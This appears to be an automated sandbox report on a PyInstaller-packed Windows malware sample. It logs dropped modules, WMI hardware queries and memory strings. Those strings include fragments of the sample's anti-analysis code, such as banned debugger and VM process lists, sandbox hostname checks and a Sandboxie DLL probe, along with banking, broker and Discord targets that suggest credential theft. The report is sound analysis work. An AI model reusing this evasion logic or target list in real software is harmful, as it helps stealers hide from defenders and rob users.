Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "WIRESHARK.EXE"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"0W
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLLP@
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE"P
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXEPL
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D132F6 rdtsc 2_2_00007FFD93D132F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2885
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 971
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4517
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1734
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe API coverage: 4.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2948 Thread sleep count: 2885 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544 Thread sleep count: 971 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 988 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268 Thread sleep count: 4517 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268 Thread sleep count: 1734 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\netsh.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00007FF7B2B683C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B69280 FindFirstFileExW,FindClose, 0_2_00007FF7B2B69280
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7B2B81874
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B69280 FindFirstFileExW,FindClose, 2_2_00007FF7B2B69280
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 2_2_00007FF7B2B683C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00007FF7B2B81874
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D13229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFDB222F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte, 2_2_00007FFD93D13229
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg Jump to behavior
Source: HOSTNAME.EXE, 00000034.00000002.2218372645.000002C49D039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFFD
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *Hyper-V Administrators
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe", # VirtualBox
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe", # VirtualBox
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxtray.exe"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b"vmware"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser.exe
Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Remote Desktop Virtualization ServicevmicrdvHyper-V Data Exchange ServicevmickvpexchangeN
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe", # VMware
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 'qemu'C
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe0~
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: [1VMware
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b"vmware"Ph
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmware"
Source: NETSTAT.EXE, 00000047.00000002.2257640995.000001D25C958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicheartbeat
Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicvss
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe"@W
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicshutdown
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2417097978.0000018B495CA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwareuser.exe"0m
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc.exeP
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if b'VMware' in stdout:
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ws Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup user ServicewbuserWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmQ$k
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwareuser.exe"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe", # VMware
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmusrvc.exe"P
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga.exe
